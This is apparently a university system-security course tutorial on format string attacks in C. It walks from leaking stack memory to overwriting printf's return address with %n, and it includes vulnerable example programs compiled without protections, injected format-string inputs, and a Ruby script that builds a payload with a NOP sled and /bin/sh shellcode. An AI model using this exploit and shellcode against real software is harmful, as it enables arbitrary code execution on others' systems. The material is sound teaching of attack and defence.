Format String Attacks

Introduction

There is a family of C functions that allows programmers to easily output formatted text. These functions are referred to as format string functions. When used properly, they are not vulnerable at all, but when used incorrectly they expose vulnerabilities that allow for arbitrary code execution.

Building a full scale attack

To build a successful format string attack that allows for arbitrary code execution, it is imperative to understand memory, stack structure, and how the format string functions work. Once these are understood, this tutorial will lead you through the following steps building up to arbitrary code execution:

Reading memory
Reading exact memory location
Altering memory with arbitrary data
Altering exact memory location with arbitrary data
Altering exact memory location with intentional data

Format string usage

The following program is a simple program that uses a format string function:

int main() {
    int a = 5, b = 6;
    char format[] = "A is %i and is at 0x%x.\nB is %i and is at 0x%x.\n";
    printf(format, a, &a, b, &b);
}

The integer a

The integer b

The string format

The address of b

The value of b

The address of a

The value of a

The address of format

When the printf function begins execution, the stack looks like the diagram on the left. The first three rows in the diagram show the local variables in the main function. The two integers take up 4 bytes each on the stack. The string format takes up 52 bytes of stack space.

When the setup for printf begins, the arguments are pushed onto the stack in reverse order. First the address of b is pushed onto the stack. Then the value of b. The address of a and the value of a are then pushed onto the stack. Last, the address of the format string is pushed onto the stack.

When the printf function begins executing, it is unaware of what arguments have been pushed onto the stack. The only thing it requires is the first argument, the address of a string. It begins reading that string and when it accesses something like a %i, it will pop the next item off of the stack. In the above example, the function sees the %i and pops off the value of a which it then prints. When it reaches the %x it pops off the address of a and prints it. This continues until the end of the string is reached.

So what would happen with the same format string and the function call printf(format)? The stack would look the same, but would not have the value of a, the address of a, the value of b, and the address of b. Therefore, when the printf function accessed the first %i, it would retrieve the next four bytes on the stack (part of the string format) and print those as an integer. This might be a bit difficult to grasp, but it is explained a little more in the following section.

Data access

As mentioned previously, format string functions are safe when they are used correctly. The code used previously could not be attacked because there is no way to control the string passed to the printf funciton (the input string). Format string vulnerabilities arise when the programmer accidently allows the user to control the input string. The following short program just reads from stdin and writes to stdout, but uses an input string that the user has control over.

#include <stdlib.h>
#include <stdio.h>
#define BUFSIZE 512

int run(FILE *input) {
  char line[BUFSIZE];
  fgets(line, BUFSIZE, input);
  printf(line);
}

int main(int argc, char **argv) {
  if (argc != 2) {
    fprintf(stderr, "program requires one argument, a filename");
    exit(1);
  }

  FILE *fd = fopen(argv[1], "r");
  if (!fd) {
    fprintf(stderr, "file must exist");
    exit(1);
  }
  run(fd);
  return 0;
}

This example would be safe if the printf line was: printf("%s", line);

Quickly compiling and running this program shows that it works as expected for harmless input values:

$ gcc -m32 -g -z execstack --no-stack-protector -o example example.c 
$ echo "hello world" > input && ./example input
hello world

But what if the input is something with format string arguments?

$ echo "hello %x %i %x %i %x" > input && ./example input
hello 200 134520840 80482a9 0 f7fe09e0
$ echo -e "AAAA.%x.%x.%x.%x.%x.%x" > input && ./example input
AAAA.200.804a008.80482a9.0.f7fe09e0.41414141

The first example above prints hello followed by some data. What is this data? It's data on the stack. The second example above sheds a little more light on what the data really is.

Recalling how the printf function works, the output from the second command prints AAAA followed by the 6 hexadecimal formatted integers. This means the function will read 4 bytes of data 6 times and print the result. The first 4 bytes result in 200; the second, third, and fifth in what look like memory addresses; the fourth in 0; and finally the sixth in 41414141.

The interesting value in this output is 41414141. Everything is actual data read from the stack, though. The information on the stack includes the buffer line (taking up BUFSIZE bytes) as well other information like the 4 byte address of the buffer line (which was pushed onto the stack when the printf function was called).
41414141 is actually the beginning of the string stored in line (the string that was read from the file). The character A translates to 0x41 in ASCII, so 4 A's is 41414141. Think about what the output would look like if you typed an extra A at the beginning of the input and an extra %x at the end of the input: echo -e "AAAAA.%x.%x.%x.%x.%x.%x.%x" > input && ./example input

If you think about what should be printed out in the above example, you might wonder why the result wasn't just AAAA.41414141.junk.junk.junk.junk.junk. The reason is that the printf function actually calls some internal libc functions before it begins doing any real work. This alters the stack a little bit adding additional arguments. You can imagine that the internal function call looks something like this: _printf(string, format_arg1, format_arg2, 200, addr, addr, 0, addr). It expects the first format argument to still be the last pushed onto the stack, though, so it prints 200 first since there were no format arguments.

Specific Data Access

Reading data off of the stack is useful, but it can only get you so far. It would be a lot more interesting to be able to read data from anywhere within the program's memory. It's actually possible and pretty easy to do. This example will walk through printing out the value of the environment variable PATH. This isn't very sensitive information, but the method used can be used to access any memory.

#include <stdlib.h>
#include <stdio.h>
int main(int argc, char *argv[]) {
  if(argc < 2) {
    printf("Usage:\n%s <environment variable name>\n", argv[0]);
    exit(0);
  }
  char *addr = getenv(argv[1]);
  if(addr == NULL) { printf("The environment variable %s doesn't exist.\n", argv[1]); }
  else { printf("%s is located at %p\n", argv[1], addr); }
  return 0;
}

Compiling the program and running it shows the address of the PATH environment variable.

$ gcc -m32 -g -z execstack --no-stack-protector -o getenv getenv.c 
$ ./getenv PATH
PATH is located at 0xffffde51

This memory address can easily be encoded at the beginning of the input string and then used to print the value of the PATH environment variable.

$ echo -e "\x4f\xde\xff\xff.%x.%x.%x.%x.%x ... %s" > input && ./example input
O???.200.804a008.80482a9.0.f7fe09e0 ... /var/lib/gems/1.8/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
$ echo -e "\x51\xde\xff\xff.%x.%x.%x.%x.%x.%x" > input && ./example input
Q???.200.804a008.80482a9.0.f7fe09e0.ffffde51
$ echo -e "\x51\xde\xff\xff.%x.%x.%x.%x.%x ... %s" > input && ./example input
Q???.200.804a008.80482a9.0.f7fe09e0 ... ar/lib/gems/1.8/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
$ echo -e "\x4f\xde\xff\xff.%x.%x.%x.%x.%x ... %s" > input && ./example input
O???.200.804a008.80482a9.0.f7fe09e0 ... /var/lib/gems/1.8/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

The buffer line

A null value

Some address

The value 200

The address of line

The address is first encoded into the string in reverse byte order. When the first command is executed, you can see that the address comes out in the proper order. Once this works, it's trivial to change the last %x to a %s. Now rather than printing out the address of the PATH variable it will print out the value of the string at that location. The PATH is printed as a result, but it's slightly off. The address used needs to be two bytes lower, and it prints the entire PATH environment variable.

The reason that the address needs to be two bytes lower is because the names of the two programs are different lengths. The program getevn is one byte shorter than example. A one byte difference in the command name doubles to a two byte difference in the address offset.

It's important to remember at this point what's actually going on. When entering the string, the entire string is copied onto the stack. The return address is at the beginning of the string (lowest on the stack). As the printf function encounters the %x values, it continues to move up the stack until it reaches the original buffer line. The first four bytes of line are the address ffffde4f, so it can either print that using %x or print the string at that memory location with %s.

Altering Memory

It seems odd that functions for printing would allow writing something in memory. It's actually fairly easy to write something to memory with a format string function. Here's an example program:

#include <stdio.h>
int main() {
   int written;
   printf("hello world\n%n", &written);
   printf("%i bytes written\n", written);
}

The %n in a format string is actually used to track the number of characters written so far while printing something out. This could be useful when using a format string function to print something like a decimal number and you need to know how long the output was. When attacking, it makes it possible to write to memory and change, for example, the return address of a function.

Altering Memory at an Exact Location

A good memory address to alter is the return address of the printf function. It's possible to use gdb to find the return address of the printf function. It's a bit tricky, though, and you must have two shells open.

Alter example.c to make a call to sleep(10) just before calling run(fd). Recompile. Then in one shell, execute the example program. In another shell you should attach gdb to the already running example program as shown below. You'll have to do this within 10 seconds or change the sleep call to something longer to allow more time.

$ ps ax | grep example
 8398 pts/1    S+     0:00 ./example input
 8400 pts/2    S+     0:00 grep example
$ gdb -q example 8398
Attaching to program: /home/example/format/example, process 8398
Reading symbols from /lib32/libc.so.6...done.
Loaded symbols for /lib32/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2

warning: Lowest section in system-supplied DSO at 0xffffe000 is .hash at ffffe0b4
0xffffe402 in __kernel_vsyscall ()
(gdb) b printf
Breakpoint 1 at 0xf7ed25e4
(gdb) c
Continuing.

Breakpoint 1, 0xf7ed25e4 in printf () from /lib32/libc.so.6
(gdb) info frame
Stack level 0, frame at 0xffffd5a0:
 eip = 0xf7ed25e4 in printf; saved eip 0x80484e8
 called by frame at 0xffffd7c0
 Arglist at 0xffffd598, args: 
 Locals at 0xffffd598, Previous frame's sp is 0xffffd5a0
 Saved registers:
  ebx at 0xffffd594, ebp at 0xffffd598, eip at 0xffffd59c
(gdb) q
The program is running.  Quit anyway (and detach it)? (y or n) y
Detaching from program: /home/example/format/example, process 8398

The gdb output shows that the return address for the printf function is at 0xffffd59c which can now be used for altering the return address.

The way to alter the address is by using a %n in the format string. The string is crafted in the same way as when accessing random memory. First enter the address to write data to. Then add enough %x's that the format string function will use the address as the next argument. Instead of adding a %s at the end, though, simply put a %n. This will write to the address rather than reading from it.

A quick test shows that altering this address crashes the program, but altering addresses 4 bytes higher does not crash it. Writing to a specific address works.

$ echo -e "\x9c\xd5\xff\xff.%x.%x.%x.%x.%x.%x" > input && ./example input
????.200.804a008.80482a9.0.f7fe09e0.ffffd59c
$ echo -e "\x9c\xd5\xff\xff.%x.%x.%x.%x.%x.%n" > input && ./example input
????.200.804a008.80482a9.0.f7fe09e0.
Segmentation fault
$ echo -e "\xa0\xd5\xff\xff.%x.%x.%x.%x.%x.%n" > input && ./example input
????.200.804a008.80482a9.0.f7fe09e0.

Writing desired values

Writing a desired value is a bit more tricky. The %n trick still has to be used. The problem is that when %n writes a value, it actually writes a 4 byte integer. The goal is to have the return address changed to be somewhere within the input string. That location needs to be determined first.

We will use 200 nops so that the address used doesn't have to be exact, so we'll estimate that the buffer is 100 bytes above where printf's return address is stored on the stack. That gives and address of 0xffffd600.

Remember, %n writes to a memory location the number of bytes that have been created so far by the printf function. It's possible to create a string that's 0xffffd600 bytes long and then have the %n, but it's not really practical. Instead, it's possible to split it up and write one byte at a time, though. Writing the address 0xffffd600 can be split up into four separate operations that write one byte each.

00	01	00	00
	d6	01	00	00
		ff	01	00	00
			ff	02	00	00

Remember that each number being written is 4 bytes long and that the bytes are written in reverse order. The first byte we need to write is 0x00. To do this, we can make the input string 256 bytes long (0x100). Then when the %n writes its value, 00 will be written to the first byte, 01 to the second byte, 00 to the third and fourth bytes. Now we need the %n to write to the address that's one byte higher than the last and put 0xd6 in it. The string needs to be extended to length 0x1d6. To write 0xff the first time, the string can be extended to length 0x1ff. The second 0xff can be written by extending the string to 0x2ff (or by simply writing the same thing again).

The table on the left shows the writing of 4 numbers. Each number is written one byte higher than the last. The end result is that the value 0xffffd600 is written into the desired memory location. Information is also overwritten in the next 3 bytes, but when overwriting a return address, that doesn't matter.

To get this to work with a format string is actually pretty easy. The formula for what the string should contain is the following:

The address to write in reverse hex
Four bytes (anything will do, we use junk)
The address to write +1 in reverse hex
Four bytes (anything will do, we use junk)
The address to write +2 in reverse hex
Four bytes (anything will do, we use junk)
The address to write +3 in reverse hex
One less than the number of %8x's so the printf function is using arguments from the start of the input string
Pairs of %#x, %n's to write to the addresses

Until now when printing a number we have used %x. What the printf function does for %x is print the number in hexadecimal notation. It doesn't ensure that it will be a certain length, though. You can specify that you want the the output to be at least 8 digits long by using %8x. We can use this to our advantage to control the length of the string. Using %100x will output 100 bytes, and the value written for the %n is now 100 greater.

With the formula above, the small ruby script below was written to create the proper input string. The important part to notice is the addr_overwrite variable. What the printf function will end up doing is this the following. It will print the first address entered followed by the word junk. It will do the same for the next 3 addresses (and the next two junk entries). Then it will begin handling the %8x's. For each of those it will print exactly 8 bytes (since 32 bit addresses in hex aren't ever longer than 8 bytes). At this point, the next argument that the printf function will interpret is 4 bytes from the start of the input string. The printf function now reaches the first pair of %#x, %n's. The %x should have a number in it that will extend the printed string long enough to write the desired integer. The printf function will process that %x by printing whatever is in memory just before the input string. Now it will handle the %n and the argument it will use is the first four bytes of the input string. That's the address that we want to write to, and now it's writing a value that we want. The next %x again extends the string, and the printf function will print out junk in hexadecimal notation. Then another %n, and the printf function will be using the second memory address to write to.

Using ruby will make writing this output a little easier. A small test program will also make it easy to test to see if the output will work properly.

$ cat output.rb
#!/usr/bin/env ruby

shellcode = ""
shellcode += "\xeb\x1c\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43"
shellcode += "\x0c\x89\xc2\x8d\x4b\x08\xb0\x0b\xcd\x80\x31\xdb\x89"
shellcode += "\xd8\x40\xcd\x80\xe8\xdf\xff\xff\xff/bin/sh"

addr_overwrite = ""
addr_overwrite += "\x9c\xd5\xff\xffjunk"
addr_overwrite += "\x9d\xd5\xff\xffjunk"
addr_overwrite += "\x9e\xd5\xff\xffjunk"
addr_overwrite += "\x9f\xd5\xff\xff"
addr_overwrite += "%8x%8x%8x%8x"
addr_overwrite += "%196x%n"
addr_overwrite += "%214x%n"
addr_overwrite += "%41x%n"
addr_overwrite += "%256x%n"

puts addr_overwrite + "\x90" * 200 + shellcode
$ chmod +x output.rb
$ cat test.c
#include <stdio.h>
#include <stdlib.h>
#define INSIZE 512

int main(int argc, char **argv) {
  char line[INSIZE];
  fgets(line, INSIZE, stdin);

  int a, b, c, d;
  printf(line, 1, 2, 3, 4, 0, &a, 0, &b, 0, &c, 0, &d);

  printf("a: 0x%x\nb: 0x%x\nc: 0x%x\nd: 0x%x\n", a, b, c, d);
  return 0;
}
$ gcc -m32 -g -z execstack --no-stack-protector -o test test.c
$ ./output.rb | ./test 
????junk????junk????junk????       1       2       3       4                                                                                                                                                                                                   0                                                                                                                                                                                                                     0                                        0                                                                                                                                                                                                                                                               0?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????[1??C??C
                                                                                                                                                  ??
                                                                                                                                                     ̀1ۉ?@̀?????/bin/sh
a: 0x100
b: 0x1d6
c: 0x1ff
d: 0x2ff

When working on this part on your own, you'll have to change the values of the last for additions to the addr_overwrite string. When you do this and rerun the command ./output.rb | ./test, you'll see the values for a, b, c and d change. The values here match up with the desired return address 0xffffd600. Once the addresses are correct, it's time to get a shell.

$ ./output.rb > input
$ ./example input 
????junk????junk????junk????     200 804a008 80482a9       0                                                                                                                                                                                            f7fe09e0                                                                                                                                                                                                              6b6e756a                                 6b6e756a                                                                                                                                                                                                                                                        6b6e756a?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????[1??C??C
                ??
                   ̀1ۉ?@̀?????/bin/sh
$ ls
example    getenv    input  output.rb.save  sys.c  test.c   written.c
example.c  getenv.c  output.rb  sys     test   written

If you have difficulty getting the shellcode to execute, you should attach gdb to the process using the same sleep trick described above. Break at the printf function, then use nexti to advance until the function is about to complete. Then use info frame to see if the return address was changed to the right value.

Copyright 2008 the following:
Sam McIngvale sam.mcingvale@u.northwestern.edu
Jim Spadaro j-spadaro@northwestern.edu
Whitney Young wbyoung@u.northwestern.edu
All rights reserved. Permission to reproduce this document in whole or in part must be obtained from the authors.

Introduction to System Security

Northwestern CS, Winter Quarter 2023